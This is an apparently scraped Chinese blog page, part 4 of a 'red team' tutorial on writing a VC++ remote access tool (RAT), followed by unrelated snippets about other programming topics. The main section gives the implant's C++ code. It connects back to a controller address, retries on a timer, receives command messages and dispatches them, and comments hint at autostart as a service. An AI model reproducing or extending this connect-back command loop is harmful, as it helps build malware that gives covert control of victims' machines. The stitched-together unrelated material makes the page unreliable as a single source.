当前位置：首页 > news >正文

红队专题-从零开始VC++C/S远程控制软件RAT-MFC-[4]客户端与服务端连接

news 2026/2/8 23:01:25

在这里插入图片描述

红队专题

招募六边形战士队员
服务端编写
- 新建工程
- server函数
- 创建主线程类
- - 获取配置信息
  - 运行
  - command 命令
  - 头文件里创建引用
  - win32 类库/头文件
  - startsocket 开始监听类函数
  - - 添加类
    - StartSocket
    - mysend/myrecv
- 设置
m_sock
Common 头文件
- MSGINFO_S 结构体
ThreadMain头文件
runflag 启动

招募六边形战士队员

一起学习代码审计、安全开发、web攻防、逆向等。。。
私信联系
在这里插入图片描述

服务端编写

新建工程

在这里插入图片描述

server函数

// FackExec_N0vv.cpp : 定义控制台应用程序的入口点。
//#include "stdafx.h"void Server();void Server()
{CThreadMain Thread_Main;  // 主线程类  对象Thread_Main.GetInfo(); //获取配置信息/*if(Auto[1] == '1'){wcscpy_s(Thread_Main.MyServiceName,(wchar_t*)ServiceName);}*/// 增加自启动  服务名while(true){if(Thread_Main.RunFlag == false){break;}SOCKET sock;sock = Thread_Main.Run();Thread_Main.Command(sock);}
}int _tmain(int argc, _TCHAR* argv[])
{Server();return 0;
}

创建主线程类

在这里插入图片描述

获取配置信息

 void CThreadMain::GetInfo()
{int Port = atoi(czPort);this->Time = atoi(czTime);this->SetupDir = atoi(czSetupDir);this->AutoFlag = atoi(czAuto);
}用来生成配置文件

在这里插入图片描述

运行

 
SOCKET CThreadMain::Run()
{SOCKET sock;while(true){sock = m_sock.StartSocket(this->Address);  // 连接远程主机  ipif(sock == NULL){Sleep(this->Time * 1000);  //  等待60sprintf("Sleep\n");continue;}else{break;}}return sock; }

command 命令

void CThreadMain::Command(SOCKET Sock)
{MSGINFO_S msg;m_Socket = Sock;while(1){if(this->RunFlag == false)  // 程序是否可以运行{break;}memset(&msg,0,sizeof(MSGINFO_S));   //  消息结构体 清空if(m_sock.MyRecv(Sock,(char*)&msg,sizeof(MSGINFO_S))==0)   // 连接{break;}ExecCommand(msg,Sock);  // 执行命令}return;
}void CThreadMain::ExecCommand(MSGINFO_S msg,SOCKET l_Socket)
{switch(msg.Msg_id){case SYSINFO:{printf("GetSystemInfo\n");m_sys.SendSysinfo(l_Socket);}break;default:{printf("UnKnow Command\n");return;}}
}

头文件里创建引用

#pragma onceclass CThreadMain
{
public:CThreadMain(void);~CThreadMain(void);void GetInfo();private:SOCKET Run();void Command(SOCKET Sock);void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);
};

win32 类库/头文件

#include <winsock2.h> stdafx.h中
头文件调用 stdafx.h
在这里插入图片描述

#pragma comment(lib,“ws2_32.lib”)
#pragma comment(lib,“User32.lib”)
#pragma comment(lib,“Advapi32.lib”)
在这里插入图片描述

startsocket 开始监听类函数

添加类

在这里插入图片描述

StartSocket

链接远程ip地址

SOCKET CMySocket::StartSocket(char Address[160])
{WSADATA data;WORD w=MAKEWORD(2,2);::WSAStartup(w,&data);SOCKET s;s=::socket(AF_INET,SOCK_STREAM,0);sockaddr_in addr;addr.sin_family = AF_INET;addr.sin_port = htons(m_port);addr.sin_addr.S_un.S_addr = inet_addr(Address);if(::connect(s,(sockaddr*)&addr,sizeof(addr))==SOCKET_ERROR){printf("Connect Error\n");DWORD e = GetLastError();printf("LastError:%d\n",e);s = NULL;}else{printf("Connect Success!\n");}return s;
}SOCKET StartSocket(char Address[160])

mysend/myrecv

int CMySocket::MySend(SOCKET socket,const char* buf,int bytes)
{const char *b = buf;while(bytes > 0) { int r = send(socket,b,bytes,0); if(r < 0) {printf("Socket_Error\n");return r; } else if(r == 0){printf("Socket_Error\n");break;} bytes -= r; b += r; } return b - (char*)buf; 
}int CMySocket::MyRecv(SOCKET socket,char* buf,int bytes)
{char *b = (char*)buf;while(bytes > 0){int r = recv(socket,b,bytes,0);if(r < 0){return 0;}else if(r == 0){break;}bytes = bytes - r;b = b + r;}return b - (char*)buf;
}

#pragma once
#include "stdafx.h"class CMySocket
{
public:CMySocket(void);~CMySocket(void);SOCKET StartSocket(char Address[160]);int MySend(SOCKET socket,const char* buf,int bytes);int MyRecv(SOCKET socket,char* buf,int bytes);
};

在这里插入图片描述

设置

在这里插入图片描述

m_sock

#pragma once#include "stdafx.h"
#include "MySocket.h"private: void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);CMySocket m_sock;char Address[160];
};

在这里插入图片描述

void CThreadMain::GetInfo()
{int Port = 1474;//this->Time = 60;//this->SetupDir = 0;//this->AutoFlag = 1;m_sock.m_port = Port;strcpy_s(Address,"127.0.0.1");}

Common 头文件

头文件新添加项

在这里插入图片描述

MSGINFO_S 结构体


#pragma once
#include <windows.h>
#define SYSINFO  0x01typedef struct tagMSGINFO //传输消息结构体
{int Msg_id;BYTE context[1024*5];
}MSGINFO_S;typedef struct tagSYSTEMINFO
{int os;bool Cam; //摄像头double ver;
}SYSTEMINFO_S;

ThreadMain头文件

#pragma once#include "stdafx.h"
#include "MySocket.h"
#include "Common.h"class CThreadMain
{
public:CThreadMain(void);~CThreadMain(void);void GetInfo();bool RunFlag;SOCKET Run();void Command(SOCKET Sock);private:void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);CMySocket m_sock;char Address[160];SOCKET m_Socket;};

runflag 启动

#include "stdafx.h"
#include "ThreadMain.h"
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"User32.lib")
#pragma comment(lib,"Advapi32.lib")void Server();void Server()
{CThreadMain Thread_Main;Thread_Main.RunFlag = true;Thread_Main.GetInfo(); //获取配置信息

在这里插入图片描述

红队专题-从零开始VC++C/S远程控制软件RAT-MFC-[4]客户端与服务端连接

红队专题招募六边形战士队员服务端编写新建工程server函数创建主线程类获取配置信息运行command 命令头文件里创建引用win32 类库/头文件startsocket 开始监听类函数添加类StartSocketmysend/myrecv 设置 m_sockCommon 头文件MSGINFO_S 结构体 ThreadMain头文件runflag 启动 …...

编程日记 2023/10/20 10:48:50

Qt Designer生成ui文件，如何转py文件，如何运行

下面将逐步介绍ui文件如何转py文件，怎么运行的具体操作步骤 ui文件转py文件 1.使用Qt Designer生成ui文件，保存到本地 2.输入 cmd ，打开命令行窗口 3.进入ui文件的目录下，文件路径使用你本地存放ui文件的位置 cd /d ui文件路径…...

编程日记 2023/10/20 10:47:46

Python数据挖掘：自动售货机销售数据分析与应用

📕作者简介：热爱跑步的恒川，致力于C/C、Java、Python等多编程语言，热爱跑步，喜爱音乐的一位博主。 📗本文收录于恒川的日常汇报系列，大家有兴趣的可以看一看 📘相关专栏C语言初阶、C…...

编程日记 2023/10/20 10:46:43

【设计模式】设计模式概述

😀大家好，我是白晨，一个不是很能熬夜😫，但是也想日更的人✈。如果喜欢这篇文章，点个赞👍，关注一下👀白晨吧！你的支持就是我最大的动力！&#x1f4…...

编程日记 2023/10/20 10:45:43

第六届“中国法研杯”司法人工智能挑战赛进行中！

第六届“中国法研杯”司法人工智能挑战赛赛题上新！ 第六届“中国法研杯”司法人工智能挑战赛（LAIC2023）目前已发布司法大模型数据和服务集成调度、证据推理、司法大数据征文比赛、案件要素识别四大任务。本届大赛中，“案件要素…...

编程日记 2023/10/20 10:44:41

关于 passing ‘const xx’ as ‘this’ argument of 的错误

今天在写一个简单的函数时，编译时出现了如下的错误： 这个很简单的函数是这样的： struct bundle_set {uint32_t baseId;uint32_t endId;bool operator< (const bundle_set &a){return baseId < a.baseId;} }; 在网上搜索到都是说什…...

编程日记 2023/10/20 10:43:40

数据结构和算法（13）：优先级队列

概述按照事先约定的优先级，可以始终高效查找并访问优先级最高数据项的数据结构，也统称作优先级队列优先级队列将操作对象限定于当前的全局极值者。根据数据对象之间相对优先级对其进行访问的方式，与此前的访问方式有着本质区别&#xf…...

编程日记 2023/10/20 10:42:39

文章目录一、题目二、题解一、题目 135. Candy There are n children standing in a line. Each child is assigned a rating value given in the integer array ratings. You are giving candies to these children subjected to the following requirements: Each chil…...

编程日记 2023/10/20 10:41:38

web APIs——第一天（上）

变量声明的时候建议 const优先，尽量使用const 原因： const语义化更好很多变量我们声明的时候就知道他不会被更改了，那为什么不用const呢？实际开发中也是，比如react框架，基本const如果你有纠结的时候&…...

编程日记 2023/10/20 10:40:36

【Leetcode】215. 数组中的第K个最大元素

一、题目 1、题目描述给定整数数组 nums 和整数 k，请返回数组中第 k 个最大的元素。请注意，你需要找的是数组排序后的第 k 个最大的元素，而不是第 k 个不同的元素。你必须设计并实现时间复杂度为 O(n) 的算法解决此问题。示例1：输入: [3,2,1,5,6,4], k = 2 输出…...

编程日记 2023/10/20 10:39:35

服务器数据恢复-RAID5常见故障的数据恢复方案

raid5阵列常见故障： 1、服务器硬件故障或者RAID阵列卡故障； 2、服务器意外断电导致的磁盘阵列故障； 3、服务器RAID阵列阵列磁盘出现物理故障，如：电路板坏、磁头损坏、盘面划伤、坏扇区、固件坏等； 4、误操作…...

编程日记 2023/10/20 10:38:33

12个VIM编辑器的高级玩法

vim 是一个很好用的编辑器，应用十分广泛。但关于 vim，总有一些你不知道的事情，我们需要持续不断的学习。我经常使用 vim，也经常在各大社区、论坛看到 vim 专家用户分享经验，今天我们就总结其中常用的一部分&#xff…...

编程日记 2023/10/20 10:37:32

⽜客论坛的笔记

项目描述: 一个基本功能完整的论坛项目。项目主要功能有: 基于邮件激活的注册方式，基于MD5加密与加盐的密码存储方式，登录功能加入了随机验证码的验证，实现登陆状态检查、为游客与已登录用户展示不同界面与功能。支持用户上传头像&#xff0c…...

编程日记 2023/10/20 10:36:31

JS逆向分析某枝网的HMAC加密、wasm模块加密

这是我2022年学做JS逆向成功的例子，URL：（脱敏处理）aHR0cHM6Ly93d3cuZ2R0di5jbi9hdWRpb0NoYW5uZWxEZXRhaWwvOTE 逆向分析： 1、每次XHR的GET请求携带的headers包括： {"X-ITOUCHTV-Ca-Timestamp":…...

编程日记 2023/10/20 10:35:30

论坛介绍｜COSCon'23开源商业（V）

众多开源爱好者翘首期盼的开源盛会：第八届中国开源年会（COSCon23）将于 10月28-29日在四川成都市高新区菁蓉汇举办。本次大会的主题是：“开源：川流不息、山海相映”！各位新老朋友们，欢迎到成都&a…...

编程日记 2023/10/20 10:34:29

在word、ppt、excel编辑软件标题栏顶部左上角加入自定义功能：另存为、导出PDF

...

编程日记 2023/10/20 10:33:28

Flink学习笔记（三）：Flink四种执行图

文章目录 1、Graph 的概念2、Graph 的演变过程2.1、StreamGraph (数据流图)2.2、JobGraph (作业图)2.3、ExecutionGraph (执行图)2.4、Physical Graph (物理图) 1、Graph 的概念 Flink 中的执行图可以分成四层：StreamGraph -> JobGraph -> ExecutionGraph -&g…...

编程日记 2023/10/20 10:32:27

堆-----数据结构

引言什么是堆？堆是一种特殊的数据结构（用数组表示的树）。为什么要使用到堆？比如一场比赛，如果使用擂台赛的方式来决出冠军（实力第一），就很难知道实力第二的队伍是什么了。但是…...

编程日记 2023/10/20 10:31:26

震撼登场 | 拓世科技集团新品亮相成为2023世界VR产业大会全场焦点

在当今世界，新一轮科技革命和产业变革蓬勃发展，虚拟现实作为这一浪潮中的代表性技术，伴随着5G商用及元宇宙概念的迅速兴起，已经成为推动数字经济发展和产业转型升级的关键技术，深刻地改变着人类的生产和生活方式。 10…...

编程日记 2023/10/20 10:30:24

后端接口的查询方式

在与前端对接过程中一直都会遇到一个问题，就是我们后端接口提供好了，自测也通过了，前端却说接口不通，当我们去排查时却发现大都不是接口不通，很多情况是前端使用的姿势不对，比如接口明明写的参数是放到ULR路…...

编程日记 2023/10/20 10:29:23

K8S认证|CKS题库+答案| 11. AppArmor

目录 11. AppArmor 免费获取并激活 CKA_v1.31_模拟系统题目开始操作： 1）、切换集群 2）、切换节点 3）、切换到 apparmor 的目录 4）、执行 apparmor 策略模块 5）、修改 pod 文件 6）、…...

编程新知 2026/1/29 2:11:35

C++：std::is_convertible

C++标志库中提供is_convertible，可以测试一种类型是否可以转换为另一只类型： template <class From, class To> struct is_convertible; 使用举例： #include <iostream> #include <string>using namespace std;struct A { }; struct B : A { };int main…...

编程新知 2025/6/11 15:23:57

中南大学无人机智能体的全面评估！BEDI：用于评估无人机上具身智能体的综合性基准测试

作者：Mingning Guo, Mengwei Wu, Jiarun He, Shaoxian Li, Haifeng Li, Chao Tao单位：中南大学地球科学与信息物理学院论文标题：BEDI: A Comprehensive Benchmark for Evaluating Embodied Agents on UAVs论文链接：https://arxiv.…...

编程新知 2026/1/22 15:36:10

MySQL 8.0 OCP 英文题库解析（十三）

Oracle 为庆祝 MySQL 30 周年，截止到 2025.07.31 之前。所有人均可以免费考取原价245美元的MySQL OCP 认证。从今天开始，将英文题库免费公布出来，并进行解析，帮助大家在一个月之内轻松通过OCP认证。本期公布试题111~120 试题1…...

编程新知 2026/1/31 7:25:57

稳定币的深度剖析与展望

一、引言在当今数字化浪潮席卷全球的时代，加密货币作为一种新兴的金融现象，正以前所未有的速度改变着我们对传统货币和金融体系的认知。然而，加密货币市场的高度波动性却成为了其广泛应用和普及的一大障碍。在这样的背景下，稳定…...

编程新知 2025/10/24 12:31:26

Hive 存储格式深度解析：从 TextFile 到 ORC，如何选对数据存储方案？

在大数据处理领域，Hive 作为 Hadoop 生态中重要的数据仓库工具，其存储格式的选择直接影响数据存储成本、查询效率和计算资源消耗。面对 TextFile、SequenceFile、Parquet、RCFile、ORC 等多种存储格式，很多开发者常常陷入选择困境。本文将从底…...

编程新知 2025/12/6 10:54:35

【笔记】WSL 中 Rust 安装与测试完整记录

#工作记录 WSL 中 Rust 安装与测试完整记录 1. 运行环境系统：Ubuntu 24.04 LTS (WSL2)架构：x86_64 (GNU/Linux)Rust 版本：rustc 1.87.0 (2025-05-09)Cargo 版本：cargo 1.87.0 (2025-05-06) 2. 安装 Rust 2.1 使用 Rust 官方安…...

编程新知 2026/1/26 14:15:48